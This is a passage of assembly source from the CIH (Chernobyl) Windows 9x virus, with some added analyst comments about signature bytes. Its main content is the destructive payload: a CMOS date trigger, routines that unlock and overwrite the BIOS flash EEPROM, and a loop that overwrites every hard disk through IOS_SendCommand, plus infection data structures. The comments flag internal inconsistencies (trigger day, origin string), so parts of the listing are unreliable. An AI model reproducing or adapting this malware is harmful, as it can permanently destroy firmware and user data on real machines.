mov(FileModificationTime-@6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
; Date gate in front of the destructive routines (analyst notes).
; Index 07h is written to port 70h and the selected CMOS/RTC value is read
; back from port 71h (the author's comment calls this the current day). The
; value is XORed with an immediate, so ZF is set only on an exact match.
; In the ELSE branch a non-matching day skips to DisableOnBusy; in the IFDEBUG
; branch the jump to DisableOnBusy is unconditional.
; NOTE(review): the trailing comment on the XOR names day 26 while the
; immediate in this listing is 01h. When deriving a trigger date for a
; sample, read the immediate from that sample's bytes, not from this comment.
IsKillComputer:
; Get Now Day from BIOS CMOS
moval, 07h
out70h, al
inal, 71h
xor al, 01h ; ??/26/????
IFDEBUG
jmpDisableOnBusy
ELSE
jnzDisableOnBusy
ENDIF
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
movbp, 0cf8h
leaesi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
movedi, 8000384ch
movdx, 0cfeh
cli
callesi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
movdi, 0058h
decedx; and al,0fh
movword ptr (BooleanCalculateCode-@10)[esi], 0f24h
callesi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
leaebx, EnableEEPROMToWrite-@10[esi]
moveax, 0e5555h
movecx, 0e2aaah
callebx
movbyte ptr [eax], 60h
pushecx
loop$
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xorah, ah
mov[eax], al
xchgecx, eax
loop$
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
moveax, 0f5555h
popecx
movch, 0aah
callebx
movbyte ptr [eax], 20h
loop$
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
movah, 0e0h
mov[eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
movword ptr (BooleanCalculateCode-@10)[esi], 100ch
callesi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
xorebx, ebx
movbh, FirstKillHardDiskNumber
pushebx
subesp, 2ch
push0c0001000h
movbh, 08h
pushebx
pushecx
pushecx
pushecx
push40000501h
incecx
pushecx
pushecx
movesi, esp
subesp, 0ach
LoopOfKillHardDisk:
int20h
dd00100004h; VXDCall IOS_SendCommand
cmpword ptr [esi+06h], 0017h
jeKillNextDataSection
ChangeNextHardDisk:
incbyte ptr [esi+4dh]
jmpLoopOfKillHardDisk
KillNextDataSection:
adddword ptr [esi+10h], ebx
movbyte ptr [esi+4dh], FirstKillHardDiskNumber
jmpLoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov[eax], cl
mov[ecx], al
movbyte ptr [eax], 80h
mov[eax], cl
mov[ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
@10=IOForEEPROM
xchgeax, edi
xchgedx, ebp
outdx, eax
xchgeax, edi
xchgedx, ebp
inal, dx
BooleanCalculateCode=$
oral, 44h
xchgeax, edi
xchgedx, ebp
outdx, eax
xchgeax, edi
xchgedx, ebp
outdx, al
ret
; *********************************************************
; *Static Data *
; *********************************************************
; Tables consumed by LoopOfRestoreVxDCallID (analyst notes).
; VxDCallIDTable holds four service identifiers and VxDCallAddressTable the
; byte distances between the corresponding call sites. Starting from
; LastVxDCallAddress and walking backwards, the restore loop writes the word
; 20CDh (INT 20h) followed by the matching identifier at each site before
; the body is written to a file.
; Defensive relevance: because of that restore step, the copy stored in a
; file carries the "CD 20 + service id" form at these four sites rather than
; whatever VMM patched into memory, so those byte sequences are stable across
; copies of this variant and are usable in a file signature.
LastVxDCallAddress=IFSMgr_Ring0_FileIO
VxDCallAddressTabledb00h
dbIFSMgr_RemoveFileSystemApiHook-_PageAllocate
dbUniToBCSPath-IFSMgr_RemoveFileSystemApiHook
dbIFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTabledd00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize=($-VxDCallIDTable)/04h
; *********************************************************
; * Virus Version Copyright *
; *********************************************************
; Plain ASCII string assembled into the body; no code in this listing
; references the label. It is a further static byte sequence for signature
; matching.
; NOTE(review): the string as printed here ends in "Thailand" while the file
; header names Taiwan; match on the bytes of the sample in hand rather than
; on this listing.
VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand'
; *********************************************************
; *Virus Size *
; *********************************************************
VirusSize=$
;+ SizeOfVirusCodeSectionTableEndMark(04h)
;+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;+ SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
; *Dynamic Data *
; *********************************************************
VirusGameDataStartAddress=VirusSize
@6=VirusGameDataStartAddress
OnBusydb0
FileModificationTimedd?
FileNameBufferdbFileNameBufferSize dup(?)
@7=FileNameBuffer
DataBuffer=$
@8=DataBuffer
NumberOfSectionsdw?
TimeDateStampdd?
SymbolsPointerdd?
NumberOfSymbolsdd?
SizeOfOptionalHeaderdw?
_Characteristicsdw?
Magicdw?
LinkerVersiondw?
SizeOfCodedd?
SizeOfInitializedDatadd?
SizeOfUninitializedDatadd?
AddressOfEntryPointdd?
BaseOfCodedd?
BaseOfDatadd?
ImageBasedd?
@9=$
SectionAlignmentdd?
FileAlignmentdd?
OperatingSystemVersiondd?
ImageVersiondd?
SubsystemVersiondd?
Reserveddd?
SizeOfImagedd?
SizeOfHeadersdd?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint=DataBuffer; DWORD
SizeOfImageHeaderToWrite= 04h
StartOfSectionTable=@9
SectionName=StartOfSectionTable; QWORD
VirtualSize=StartOfSectionTable+08h; DWORD
VirtualAddress=StartOfSectionTable+0ch; DWORD
SizeOfRawData=StartOfSectionTable+10h; DWORD
PointerToRawData=StartOfSectionTable+14h; DWORD
PointerToRelocations=StartOfSectionTable+18h; DWORD
PointerToLineNumbers=StartOfSectionTable+1ch; DWORD
NumberOfRelocations=StartOfSectionTable+20h; WORD
NumberOfLinenNmbers=StartOfSectionTable+22h; WORD
Characteristics=StartOfSectionTable+24h; DWORD
SizeOfScetionTable=Characteristics+04h-SectionName
; *********************************************************
; *Virus Total Need Memory *
; *********************************************************
VirusNeedBaseMemory=$
VirusTotalNeedMemory=@9
;+ NumberOfSections(??)*SizeOfScetionTable(28h)
;+ SizeOfVirusCodeSectionTableEndMark(04h)
;+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;+ SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
VirusGame ENDS
END FileHeader